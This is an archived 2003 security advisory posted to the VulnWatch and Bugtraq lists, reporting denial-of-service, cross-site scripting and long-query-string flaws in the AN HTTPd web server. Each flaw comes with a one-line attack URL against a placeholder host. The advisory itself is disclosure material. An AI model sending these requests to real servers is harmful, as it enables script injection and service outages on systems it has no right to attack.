[VulnWatch] AN HTTPd v.1.41e: DoS, CSS, real patch attack

From: D4rkGr3y (grey_1999@mail.ru)
Date: 01/04/03

  • Next message: NaSsEr .M.Sh: "[VulnWatch] A security vulnerability in S8Forum"
    Date: Sat, 4 Jan 2003 06:12:09 -0800
    From: D4rkGr3y <grey_1999@mail.ru>
    To: bugtraq@securityfocus.com, submissions@packetstormsecurity.com, vulnwatch@vulnwatch.org
    
    

    #####################################################*
    # Damage Hacking Group security advisory
    # www.dhgroup.org
    #####################################################*
    #Product: AN HTTPd server
    #Authors: [www.st.rim.or.jp]
    #Vulnerability: DoS, CSS, 'real patch' attack
    ######################################################*

    #Overview#--------------------------------------------------------------#
    This is Japanez http-server for win32-platforms. U can download it from
    www.st.rim.or.jp.

    #Problem#---------------------------------------------------------------#
    (1) real patch attack:
    http://www.vuln_host.com/[script]?aaaaaa..[1kb]...aaaaaa
    Where [script] - any cgi\batch script.
    (2) CSS:
    http://www.vuln_host.com/[script]?<h1>HACKED</h1>aaaa..[up_to_1kb]..aaaa
    (3) DoS:
    http://www.vuln_host.com/aux.cgi?aaaa..[1kb]..aaaa
    AN HTTPd will return error "broken pipe" every time,
    when somebody will execute any cgi\batch scripts on it.

    #Fix#--------------------------------------------------------------------#
    Download Apache or OmniHTTPd :)

    #Exploit#----------------------------------------------------------------#
     ------
    #EOF

    Best regards www.dhgroup.org
      D4rkGr3y icq 540981



    Relevant Pages

    • AN HTTPd v.1.41e: DoS, CSS, real patch attack
      ... DoS, CSS, 'real patch' attack ... real patch attack: ...
      (Bugtraq)
    • Re: [Full-disclosure] Denial of Service in WordPress
      ... How will that lead to DoS? ... Attack exactly overload web sites presented in endless loop of redirects. ... Browsers vendors long time ago became fighting with such state - ... February 2009 in my article Hellfire for redirectors. ...
      (Full-Disclosure)
    • Re: whats the best virus protection
      ... >> haven't they now been given the go ahead to lauch DOS attacks against ... > give the content industry the legal power to attack infringers (DoS'ing ... [quote from "Steal This File Sharing Book - What They Wont Tell You About ... Martin Spencer-Ford ...
      (alt.comp.anti-virus)
    • RE: DOS ATTACK
      ... Subject: DOS ATTACK ... server which I guess is your problem. ... block traffic based on referrer. ...
      (Incidents)
    • Fwd: GOBBLES RESPONSE TO THE BLUE BOAR ("fixed version")
      ... the cross-site scripting attack... ... my official response is that your CSS ... your guestbook is only a subset of how much other mischief can be caused on ...
      (Bugtraq)